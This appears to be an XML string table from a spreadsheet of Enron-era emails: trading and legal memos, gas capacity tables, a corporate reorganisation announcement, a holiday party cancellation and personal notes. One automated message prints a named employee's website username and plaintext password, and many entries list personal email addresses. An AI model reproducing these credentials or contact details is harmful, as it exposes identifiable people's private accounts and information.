    <t>Wed, 7 Jun 2000 00:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tanya:_x000D_
On Friday I emailed a new vol curve to use for VAR testing.  I was under the _x000D_
impression that you could apply this vol curve to the price book and storage _x000D_
book and have a new experimental VAR number by Monday. I have not received _x000D_
any response.  Please reply with status of this project._x000D_
John</t>
  </si>
  <si>
    <t>Sun, 3 Jun 2001 08:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chedleston@home.com', 'mcgee.nora@epamail.epa.gov', 'pat_scatena@ccm.sc.intel.com', 'padysplace@aol.com', 'virgo57@webtv.net', 'lhom@hotmail.com', 'agrubb@calnurses.org', 'jlwalker@hotmail.com', 'lnewmansciarrino@elanpharma.com', 'madeleinet@earthlink.net', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>It's time for a BBQ!</t>
  </si>
  <si>
    <t>Hello all, I am having a bbq on Saturday, June 23 at 5:00. It is byob_x000D_
your own something to barbecue. It is the weekend of the Sonoma County_x000D_
Fair so those who want to - we can go check out the fair after. Please_x000D_
respond. Hope everyone will be around it will be great to see_x000D_
everyone.   kari_x000D_
_x000D_
ps I galloped Oscar around the trails today and he was very happy. He_x000D_
thinks he has died and gone to horse heaven! Everyone has to come and_x000D_
visit him and we can gallop around the trails.</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 06:57:19 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sblalock@calpine.com'})</t>
  </si>
  <si>
    <t>hey</t>
  </si>
  <si>
    <t>havent forgot , i didnt get a chance to update it. will send it soon. talk to you later</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 07:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'christopher.calger@enron.com', 'david.delainey@enron.com', 'steve.hall@enron.com', 'elizabeth.sager@enron.com', 'richard.shapiro@enron.com', 'jklauber@llgm.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>With indemnification</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Christian Yoder/HOU/ECT on 02/15/2001 _x000D_
02:42 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Pat Boylston" &lt;pgboylston@stoel.com&gt;                           _x000D_
02/15/2001 03:21 PM_x000D_
	_x000D_
_x000D_
To: Christian.Yoder@enron.com_x000D_
cc:  _x000D_
Subject: With indemnification_x000D_
_x000D_
_x000D_
 - AmendABX1.wpd_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 08:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cigar-admin@nfic.com'})</t>
  </si>
  <si>
    <t>Cigar Aficionado Account Service</t>
  </si>
  <si>
    <t>Don,_x000D_
_x000D_
This message was automatically generated from Cigar Aficionado_x000D_
Online. An on-line request was made to email your account information_x000D_
to don.baughman`enron.com._x000D_
_x000D_
The following account matches your email address:_x000D_
_x000D_
Username: dbaughm_x000D_
Password: houston_x000D_
_x000D_
Contact our site administrators with any additional questions.  Thank_x000D_
you._x000D_
_x000D_
_x000D_
Cigar Aficionado Online</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 08:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">The following basic assumptions concerning gas capacity requirements for the _x000D_
Fort Pierce project were confirmed today at a meeting attended by Dave _x000D_
Fairley, Ed McMichael, Ruth Concannon, Mark Breese, Eric Boyt, and Charlie _x000D_
Weldon.   (NOTE:  The heat rates and MW are subject to change pending final _x000D_
engineering evaluation.  The intent of this note is to document the overall _x000D_
runtime assumptions.)_x000D_
_x000D_
1) During the summertime months of May through September, the plant is _x000D_
expected to run 16 hours per day in a mode where  Enron's 200 MW are _x000D_
dispatched as are Ft. Pierce's 82MW._x000D_
_x000D_
2)  Enron will purchase summertime capacity only sufficient to allow running _x000D_
200 MW for 16 hours per day at our "bought-down" heat rate of 6690.  This _x000D_
equals 22,300 MMBTU/day and will allow for taking the full daily capacity in _x000D_
only a 16 hour period (6% per hour)  The table below summarizes the monthly _x000D_
capacity requirements:_x000D_
_x000D_
_x000D_
   MONTH	Total Capacity Needed By Enron	Ft. Pierce Capacity (from FGU)	Phase VI Capacity 	_x000D_
Capacity From East Desk_x000D_
May	22,300	0	22,300	0_x000D_
June	22,300	0	22,300	0_x000D_
July	22,300	0	22,300	0_x000D_
August	22,300	0	22,300	0_x000D_
September	22,300	0	22,300	0_x000D_
_x000D_
  NTOE:  Prior to Phase VI completion, the project will purchase capacity _x000D_
from the East Desk._x000D_
_x000D_
3)  Ft. Pierce will use its existing FT via FGU to secure its gas _x000D_
requirements at the 9500 contractual heat rate for the 16 hours it is _x000D_
dispatched in the summer._x000D_
_x000D_
4)  For the winter months of October through April, the plant is expected to _x000D_
run 16 hours per day in a mode where Ft. Pierce is not dispatched, thus _x000D_
leaving Enron with 282MW at the overall plant heat rate of 7500.  This _x000D_
equates to 35,251 MMBTU/day and allows for taking the full capacity in only _x000D_
16 hours (6% per hour)_x000D_
_x000D_
5)  Because Ft. Pierce will not be dispatched during the winter, their unused _x000D_
capacity via FGU will be available for Enron.  These amounts differ by month _x000D_
as summarized in the table below._x000D_
_x000D_
6) Enron will purchase wintertime capacity only sufficient to allow running _x000D_
282 MW for 16 hours per day at a 7500 heat rate, less the monthly capacities _x000D_
available from Ft. Pierce via FGU.  These non-FGU purchased quantities will _x000D_
come from the Phase VI capacity and the East Desk as shown below:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
   MONTH	Total Capacity Needed By Enron	Ft. Pierce Capacity (from FGU)	Phase VI Capacity _x000D_
(Nov-Mar = 28% of Summer)	Capacity From East Desk_x000D_
October	35,251	14,665	22,300	0_x000D_
November	35,251	14,595	6,244	14,412_x000D_
December	35,251	14,895	6,244	14,112_x000D_
January	35,251	16,547	6,244	12,460_x000D_
February	35,251	15,317	6,244	13,690_x000D_
March	35,251	15,317	6,244	13,690_x000D_
April	35,251	15,317	22,300	0_x000D_
_x000D_
NOTE:  Prior to Phase VI completion , the project will purchase capacity from _x000D_
the East Desk._x000D_
_x000D_
7)  Backup documentation supporting the hourly gas requirement in each _x000D_
dispatch mode is attached to this memo._x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 09:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Panda Energy</t>
  </si>
  <si>
    <t xml:space="preserve">Steve:_x000D_
_x000D_
I talked with Ben this afternoon and understand that we are ready to proceed _x000D_
with Panda Energy in a transaction involving the sale of member interests in _x000D_
special purpose entities associated with the four(4) LV units.  I have left a _x000D_
message with Panda letting them know that we are prepared to proceed and will _x000D_
begin preparing a set of draft definitive agreements for their review.  I _x000D_
have asked Panda to confirm that they are ready to receive these documents _x000D_
and proceed.  I understand that you are in Houston.  Please call/see me _x000D_
tomorrow morning so that we can discuss this transaction._x000D_
_x000D_
Kay:  We need to prepare a draft set of definitive agreements for this _x000D_
transaction.  Can Carolyn complete this while you are in New York?  Also, _x000D_
what is the status of the LM Breakout contract for the 4 LV units.  Let me _x000D_
know._x000D_
_x000D_
Kathleen:  We need to confirm tomorrow morning that we have received executed _x000D_
CA's from Panda.  I have the CA execution originals for the four Panda _x000D_
entities at my desk for Ben's signature.  These need to be received prior to _x000D_
sending Panda the definitive agreements.  We will fax signature pages to Ben _x000D_
tomorrow._x000D_
_x000D_
Chris:  See me tomorrow morning to discuss the technical spec's that were _x000D_
sent to Panda_x000D_
_x000D_
I will be at my desk by 8 am tomorrow morning._x000D_
_x000D_
Thanks,_x000D_
Fred_x000D_
x35406_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Apr 2000 10:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Net Works</t>
  </si>
  <si>
    <t>It is becoming increasingly clear that the development of eCommerce will ha=_x000D_
ve=20_x000D_
a significant and continuing impact on the conduct of business in a broad=_x000D_
=20_x000D_
array of industries.  Through EnronOnLine, Enron has quickly become a major=_x000D_
=20_x000D_
catalyst for the transition to the web in the gas and electric industries. =_x000D_
=20_x000D_
EnronOnLine has been an enormous success since its launch.  Since launch, w=_x000D_
e=20_x000D_
have completed 67,043 transactions on line, with a total dollar value of ov=_x000D_
er=20_x000D_
$25 billion.  EnronOnLine is now the largest eCommerce site in the world._x000D_
_x000D_
We believe that the competitive success of EnronOnLine is due to one very=_x000D_
=20_x000D_
specific reason.  In addition to providing a web-based platform for=20_x000D_
transactions, Enron acts as principal to provide direct liquidity to the=20_x000D_
site.  We stand ready at all times, in any market conditions, to buy and se=_x000D_
ll=20_x000D_
at the posted price.  This converts a =01&amp;bulletin board=018 (the more typi=_x000D_
cal=20_x000D_
eCommerce concept) into a true market.  There are very few, if any,=20_x000D_
competitors that can provide this capability._x000D_
_x000D_
We are increasingly convinced that this competitive advantage can be=20_x000D_
dramatically expanded to other products and other geographies.  If we are=_x000D_
=20_x000D_
correct, this could provide an enormous new opportunity for growth for Enro=_x000D_
n._x000D_
_x000D_
Accordingly, we are initiating a major new effort to capture this=20_x000D_
opportunity.  Effective today we are creating a new business, Enron Net=20_x000D_
Works, to pursue new market development opportunities in eCommerce across a=_x000D_
=20_x000D_
broad range of industries.  It is likely that this business will ultimately=_x000D_
=20_x000D_
be our fifth business segment, joining transmission &amp; distribution,=20_x000D_
wholesale, retail and broadband services._x000D_
_x000D_
Included in this business will be our entire IT and technology group along=_x000D_
=20_x000D_
with significant talent and resources in market making and finance. =20_x000D_
Initially, North America will provide primary direct support for staff=20_x000D_
services and back office, however, over time we will be requesting support=_x000D_
=20_x000D_
services from virtually all Enron units to ensure continued growth and=20_x000D_
success.  To facilitate the combining of commercial capabilities with these=_x000D_
=20_x000D_
new eCommerce platforms, Enron Net Works will work closely with the merchan=_x000D_
t=20_x000D_
functions of North America, Europe, South America, CALME, Asia and Broadban=_x000D_
d._x000D_
_x000D_
Enron Net Works will be headed by Greg Whalley, Chief Executive Officer; Mi=_x000D_
ke=20_x000D_
McConnell, Chief Operating Officer; and Jeff McMahon, Chief Commercial=20_x000D_
Officer.  These individuals will comprise the Office of the Chairman for=20_x000D_
Enron Net Works and remain on the Executive Committee of Enron Corp. =20_x000D_
Replacing Greg Whalley as President and Chief Operating Officer of Enron=20_x000D_
North America is Dave Delainey, who will also join Enron=01,s Executive=20_x000D_
Committee._x000D_
_x000D_
Global Technology will remain intact but will now be a part of Enron Net=20_x000D_
Works.  It will maintain all of the same businesses and services as it did =_x000D_
as=20_x000D_
an Enron global function.  Philippe Bibi will remain the Chief Technology=_x000D_
=20_x000D_
Officer for all of Enron Corp. and continues to be responsible for the=20_x000D_
development of worldwide technology standards and platforms._x000D_
_x000D_
EnronOnLine, headed by Louise Kitchen, will also remain intact and will now=_x000D_
=20_x000D_
be a part of Enron Net Works.  The success of EnronOnLine enables us to=20_x000D_
utilize this site as a model as we explore other markets. In addition, the=_x000D_
=20_x000D_
following individuals are included in Enron Net Works along with their=20_x000D_
current eCommerce initiatives: Harry Arora, Public Financial Securities; Ja=_x000D_
y=20_x000D_
Fitzgerald, New Markets Identification; Bruce Garner, Metals; and Greg Pipe=_x000D_
r,=20_x000D_
Pulp and Paper._x000D_
_x000D_
Over the next several weeks we will complete staffing and organizational=20_x000D_
design and will provide full details on this exciting new business=20_x000D_
opportunity.</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 10:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Direct Connect Pilot Program Agreement</t>
  </si>
  <si>
    <t>Mark Taylor and I reviewed the subject agreement and have some general _x000D_
comments._x000D_
_x000D_
Given the agreement is between EBS and the outside counterparties we would _x000D_
like to eliminate any mention of EnronOnline (the only place were we feel it _x000D_
may be necessary is in the failover article IV).   EBS has the EIN which can _x000D_
be used as an alternative to the Internet and the customer has agreed to use _x000D_
such alternative._x000D_
The term can be month to month with thirty days written notice by either _x000D_
party.  No need to mention EnronOnline or the pilot program. _x000D_
Can we make this agreement much more customer friendly?  This appears to be _x000D_
an agreement that you use with customers who are being guranteed a certain _x000D_
level of service (as evidenced by the reference to ePowered Content in _x000D_
Article XIII).  We would like to keep the agreement focused on access to _x000D_
facility, letter of authorization and the interconnect order if possible.   I _x000D_
understand that you are commiting to EnronOnline a certain level of service _x000D_
which is predicated upon your ability to get assurances from our customers _x000D_
however we should deal with that in our agreement if necessary._x000D_
What is the extent of the equiptment that we will be housing at the _x000D_
facilities?  If it is limited this would give us another opportunity to _x000D_
reduce the scope of the contract._x000D_
_x000D_
Lets discuss tomorrow and see if we can get this wrapped up.  Lorraine will _x000D_
schedule.  Thanks</t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 12:07:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Bonneville Power Administration Transmission Customer Web_x000D_
 Interfa</t>
  </si>
  <si>
    <t>You probably will want to be familiar with this website, I can offer some training, but all hourly transmission reservations will need to utilize this website after 10/01/01_x000D_
_x000D_
-----Original Message-----_x000D_
From: Holden-Baker, Susan - TMS-DITT1 [mailto:smholden@bpa.gov]_x000D_
Sent: Tuesday, August 28, 2001 7:38 AM_x000D_
To: Interchange Scheduling &amp; Accounting Subcommittee (ISAS)_x000D_
Subject: Bonneville Power Administration Transmission Customer Web_x000D_
Interfa_x000D_
_x000D_
_x000D_
First - sorry if you receive this 2 or 3 times and a further apology if you_x000D_
don't schedule with BPAT - just want to catch as many of you as I can!_x000D_
_x000D_
Last week we offered a hands on training of our new Customer Web Interface_x000D_
(CWI).  At this time there are no plans to offer additional training_x000D_
sessions._x000D_
Our current plan is to have one or two customer meetings the week of 9/17_x000D_
where we will train a large group (no hands on).  The CWI is out on our web_x000D_
site for customers to review and play with now (test version).  The_x000D_
following URL should take you directly to the test site.  If you put the_x000D_
cursor over the word scheduling you'll see the link to "Transmission and_x000D_
Demand Scheduling"._x000D_
http://taim-test.transmission.bpa.gov/taim/_x000D_
_x000D_
If you go out and test it (make sure to print out the User Guide) that will_x000D_
provide you with an opportunity to do some self-training prior to the_x000D_
September session(s).  The final date for the CWI customer meeting will be_x000D_
posted on our OASIS.  I would encourage you to sign up for the e-mail_x000D_
exploder for updates on future CWI meetings (and all TBL business_x000D_
practices).  Also, the CWI is still a work in progress so newer versions are_x000D_
being loaded from time to time.  The User Guide is updated at the same time_x000D_
and includes a new version number each time a change is made. _x000D_
_x000D_
To sign up for the email automatic notification (exploder) go to the_x000D_
following OASIS location:_x000D_
www.transmission.bpa.gov/OASIS/BPAT_x000D_
_x000D_
Select Forums (tab on upper part of the screen); next select Information_x000D_
Notification; next select E-mail Forum.  Enter your name and email address_x000D_
and select "Register"_x000D_
_x000D_
If you have any questions please contact me.  Thank you._x000D_
_x000D_
Sue Holden-Baker_x000D_
Bonneville Power Administration Transmission Scheduling_x000D_
smholden@bpa.gov_x000D_
(360) 418-8278</t>
  </si>
  <si>
    <t>Sun, 3 Dec 2000 06:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cuiaba Memo</t>
  </si>
  <si>
    <t xml:space="preserve">Kind of old but still relavent. FYI Rick_x000D_
--------------------- Forwarded by Rick Buy/HOU/ECT on 12/03/2000 02:31 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
James M Bannantine@ENRON_DEVELOPMENT_x000D_
11/13/2000 02:36 PM_x000D_
To: Jeff Skilling@ENRON, Andrew S Fastow@ECT, Richard Causey@ENRON, Rick _x000D_
Buy@ECT_x000D_
cc: Mark Frevert@Enron, David W Delainey@ECT, Brett R Wiggs/SA/Enron@Enron, _x000D_
Joe Kishkill/SA/Enron@Enron, Richard A Lammers/SA/Enron@Enron _x000D_
Subject: Cuiaba Memo_x000D_
_x000D_
Here is the memo that I mentioned on the Cuiaba project.  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 25 Mar 2001 04:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mreuter@kslaw.com', 'jkeffer@kslaw.com'})</t>
  </si>
  <si>
    <t>Re: 200 Team meeting re NW exclusivity</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/25/2001 12:24 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Ben F Jacoby@ECT_x000D_
03/25/2001 12:17 PM_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: 200 Team meeting re NW exclusivity  _x000D_
_x000D_
Works for me._x000D_
_x000D_
_x000D_
_x000D_
Kay Mann@ENRON_x000D_
03/25/2001 01:09 PM_x000D_
To: Ben Jacoby/HOU/ECT@ECT, Chris Booth/NA/Enron@Enron, Carlos _x000D_
Sole/NA/Enron@Enron, jkeffer@kslaw.com, mreuter@kslaw.com, Jeffrey T _x000D_
Hodge/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 200 Team meeting re NW exclusivity_x000D_
_x000D_
Opps.  I should add that Mr. Hodge has a free pass to miss this and all other _x000D_
NW phone calls._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/25/2001 12:06 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
03/25/2001 12:04 PM_x000D_
To: Ben Jacoby/HOU/ECT@ECT, Chris Booth/NA/Enron@Enron, jkeffer@kslaw.com, _x000D_
mreurter@kslaw.com, Jeffrey T Hodge/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 200 Team meeting re NW exclusivity_x000D_
_x000D_
Hi there,_x000D_
_x000D_
Just confirming a 200 CST Enron team conference call.  Is this going to work _x000D_
for everyone, with the exception of Carlos, who is now excused?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'doug.arnell@enron.com'})</t>
  </si>
  <si>
    <t>Re: LNG Book</t>
  </si>
  <si>
    <t xml:space="preserve">Doug,_x000D_
_x000D_
Can we meet at 9 on Tuesday instead?_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Arnell@ENRON_DEVELOPMENT_x000D_
07/06/2000 02:36 PM_x000D_
To: Vince J Kaminski@ECT_x000D_
cc:  _x000D_
Subject: LNG Book_x000D_
_x000D_
Vince, I would like to have another update meeting to talk about our progress _x000D_
on the LNG book.  Would this coming tuesday morning at 10 work for you and _x000D_
your group?_x000D_
_x000D_
Please let me know._x000D_
_x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 07:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sonya.clarke@enron.com', 'frank.davis@enron.com', 'niamh.clarke@enron.com'})</t>
  </si>
  <si>
    <t>El Paso Blanco Avg product</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 07/14/2000 _x000D_
02:00 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kenneth Shulklapper                           07/14/2000 06:58 AM_x000D_
	_x000D_
_x000D_
To: Phillip K Allen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: El Paso Blanco Avg product,_x000D_
_x000D_
_x000D_
_x000D_
Please extend all internal gas traders view access to the new El Paso Blanco _x000D_
Avg physical NG product._x000D_
_x000D_
Tori Kuykendahl and Jane Tholt should both have administrative access to _x000D_
manage this on EOL._x000D_
_x000D_
If you have any questions, please call me on 3-7041_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Phillip Allen_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 13:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: EEX Unwind Quote</t>
  </si>
  <si>
    <t xml:space="preserve">the offer is 4.275_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Weldon, V. Charles  _x000D_
Sent:	Thursday, May 24, 2001 3:12 PM_x000D_
To:	Quigley, Dutch_x000D_
Subject:	EEX Unwind Quote_x000D_
_x000D_
Dutch,_x000D_
_x000D_
Here's the quote sheet starting in August._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Charlie_x000D_
_x000D_
 &lt;&lt; File: Quote Sheet 5-24-01.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 13:37:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'debner@jpi.com'})</t>
  </si>
  <si>
    <t>FW: Holiday Party - Canceled</t>
  </si>
  <si>
    <t>Well, this was the only other thing I had going on that weekend.  But believe me, I was willing to miss it._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Enron Announcements/Corp/Enron@ENRON   On Behalf Of Ken Lay- Chairman of the Board &amp; CEO@ENRON_x000D_
Sent:	Monday, November 19, 2001 3:35 PM_x000D_
To:	All Enron Houston@ENRON_x000D_
Subject:	Holiday Party - Canceled_x000D_
_x000D_
_x000D_
I know that this is a difficult time for all of us.  With everything going on inside the company as well as in the world around us, we have been carefully considering whether a holiday celebration is appropriate this year.  To be honest, employee feedback has been mixed.  Many viewed the holiday party as a unique opportunity for us to come together as Enron employees to share the spirit of the season.  Others felt a holiday party would be improper given the company's current circumstances._x000D_
_x000D_
After weighing these points of view, we have ultimately decided to cancel the all-Enron holiday party that was scheduled for December 8.  Given what has transpired over the past month, it could be considered imprudent for Enron to incur the expense of such an event.  I regret that this action is necessary because I recognize that your hard work throughout the year merits a holiday celebration and so much more.  We will attempt to find other, more appropriate ways to recognize your outstanding contributions as we move into the holiday season._x000D_
_x000D_
Ken Lay</t>
  </si>
  <si>
    <t>Re: Confidentiality agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Oh yeah, I was outside all weekend.  Yesterday I painted one of my birdbaths _x000D_
(it was pretty ugly - just grey concrete), now the bath part is blue with a _x000D_
yellow center (its a flower bath) and I will have to paint the base next _x000D_
weekend.  No kayaking though.  Ole Norm partied just a little too hard on _x000D_
Saturday night and had to fly out to Midland yesterday afternoon._x000D_
_x000D_
I think my eggplant died.  I must have planted it on the new, worthless dirt _x000D_
side._x000D_
_x000D_
K-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
05/14/2001 01:18 PM_x000D_
To: Kathleen Carnahan/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Confidentiality agreement  _x000D_
_x000D_
I thought of you yesterday.  I planted an eggplant plant and a pepper plant.  _x000D_
What a great weekend - I lived outside.  What about you?_x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kathleen Carnahan                           05/14/2001 01:17 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Confidentiality agreement  _x000D_
_x000D_
Still pretty nasty language huh?  How was your Mother's Day Mulching Party?  _x000D_
Great day wasn't it?_x000D_
_x000D_
K-_x000D_
_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
05/14/2001 01:00 PM_x000D_
To: Mark Metts/Enron@EnronXGate, Timothy J Detmering/HOU/ECT_x000D_
cc: John Llodra/Corp/Enron@ENRON, W David Duran/Enron@EnronXGate, Lance _x000D_
Schuler-Legal/HOU/ECT@ECT (bcc: Kathleen Carnahan/NA/Enron)_x000D_
_x000D_
Subject: Confidentiality agreement_x000D_
_x000D_
Gentlemen,_x000D_
_x000D_
I'm with EWS Legal, and I'm working with John Llodra (East Power origination) _x000D_
concerning a confidentiality agreement with Ameresco.  The proposed _x000D_
transaction is described as follows:_x000D_
_x000D_
 A potential power plant site development and asset management services _x000D_
related to the Island End Generation Project, a nominal  365 MW combined _x000D_
cycle power generation facility, proposed to be located in Everett, _x000D_
Massachusetts._x000D_
_x000D_
The current draft of the CA contains this language:_x000D_
_x000D_
 From the time of the signing of this Agreement until October 1, 2001 neither _x000D_
Party shall pursue the Proposed Transaction without  the participation of the _x000D_
other Party, unless the other Party consents in writing or notifies the other _x000D_
Party that it does not intend to   pursue the Proposed Transaction._x000D_
_x000D_
In accordance with policy, this issue is being submitted to you for your _x000D_
review.  _x000D_
_x000D_
John can be contacted at 978 449 9936.  My extension is 57566._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay_x000D_
_x000D_
Here is the entire CA:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Mar 2001 05:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.bush@enron.com', 'lee.papayoti@enron.com', 'anita.luong@enron.com', 'paul.fox@enron.com', 'james.prentice@enron.com', 'maritta.mullet@enron.com', 'sally.shuler@enron.com', 'gregg.lenart@enron.com', 'robert.lee@enron.com', 'mark.diedrich@enron.com', 'john.goodpasture@enron.com', 'daren.farmer@enron.com', 'david.johnson@enron.com', 'steven.elliott@enron.com', 'john.nowlan@enron.com', 'thomas.meers@enron.com'})</t>
  </si>
  <si>
    <t>NATURAL GAS NOMINATION FOR 04/01</t>
  </si>
  <si>
    <t>Enron Methanol nominates the following natural gas requirements for the _x000D_
Methanol Plant for April 2001:_x000D_
_x000D_
30,000 mmbtu per day_x000D_
_x000D_
EGPFC nominates the following natural gas requirements for the MTBE Plant at _x000D_
Morgan's Point for April 2001:_x000D_
_x000D_
8,500 mmbtu per day</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Ben and Kay:_x000D_
_x000D_
For ease of reference, I am attaching the latest draft of letter agreement,_x000D_
marked to show all changes since the version sent out on Thursday, April_x000D_
12th (the version that Ben was commenting on yesterday at lunch)._x000D_
_x000D_
Regards,_x000D_
_x000D_
Marisa Reuter_x000D_
_x000D_
 &lt;&lt;MarkedLetterAgreement.DOC&gt;&gt;_x000D_
_x000D_
_x000D_
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 MarkedLetterAgreement.DOC</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 04:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Asset Financing - Structured Finance Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">FYI. Certain aspects of this presentation will relate to PPA's/tolling _x000D_
agreements/interconnection studies and agreements  relating to Enron _x000D_
developed generation assets from which we intend to purchase power, etc.  _x000D_
_x000D_
The cost/benefit would probably be marginal for you, but I will be there, and _x000D_
will get you any interesting handouts._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/08/2001 11:36 _x000D_
AM ---------------------------_x000D_
From: Roseann Engeldorf/ENRON@enronXgate on 05/02/2001 02:20 PM_x000D_
To: Sheila Tweed/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron, Barbara N _x000D_
Gray/HOU/ECT@ECT, Dale Rasmussen/HOU/ECT@ECT, Karen E Jones/ENRON@enronXgate, _x000D_
Ed B Hearn III/HOU/ECT@ECT, Matt Maxwell/Corp/Enron@ENRON, Lance _x000D_
Schuler-Legal/HOU/ECT@ECT, Barton Clark/HOU/ECT@ECT, Kathleen _x000D_
Carnahan/NA/Enron@Enron, Jeffrey T Hodge/HOU/ECT@ECT, John _x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ann Elizabeth _x000D_
White/HOU/ECT@ECT, Scott Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Carlos _x000D_
Sole/NA/Enron@Enron, Randy Pais/Corp/Enron@Enron, Jordan _x000D_
Mintz/ENRON@enronXgate, Nora Dobin/Corp/Enron@ENRON, Brian D _x000D_
Barto/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Larry Bishop/NA/Enron@Enron, _x000D_
Cheryl Costa/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jim _x000D_
Desrochers/NA/Enron@Enron, Richard _x000D_
Murphy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John G _x000D_
Rigby/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Robert Sevitz/NA/Enron@Enron, _x000D_
Keegan Farrell/NA/Enron@Enron, Joel Ephross/ENRON@enronXgate, Gareth _x000D_
Bahlmann/ENRON@enronXgate, Julia H Chin/ENRON@enronXgate, Brenda L _x000D_
Funk/ENRON@enronXgate_x000D_
cc: Herman Manis/ENRON@enronXgate, William Fleenor/ENRON@enronXgate, Dina _x000D_
Snow/Corp/Enron@Enron, Lisa Bills/ENRON@enronXgate, Shirley _x000D_
Oliver/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Asset Financing - Structured Finance Presentation_x000D_
_x000D_
We are planning a presentation on certain structure and contracting issues _x000D_
related to power plant asset financing on Thursday, May 10th.  The _x000D_
presentation will include lunch from Treebeard's and will begin at 11:30.  We _x000D_
have scheduled 2.5 hours for the presentation; it may be shorter, depending _x000D_
on the number of questions. _x000D_
_x000D_
We plan to include the Portland folks by video-conference.   If you know of _x000D_
others who would benefit from this presentation, please pass on this _x000D_
invitation; I have not intended to exclude anyone who may want to attend.  If _x000D_
there are others at remote locations, please let me or Dina Snow know so that _x000D_
we can arrange for video-conferencing.  John, I asked Shirley for the names _x000D_
of your contracts folks and have included them; I still have no information _x000D_
as to whom else you want to include.  Therefore, please forward this to your _x000D_
team members as you see fit._x000D_
_x000D_
Please RSVP to Dina Snow at X57099 or by e-mail to dina.snow@enron.com by _x000D_
Tuesday, May 8th._x000D_
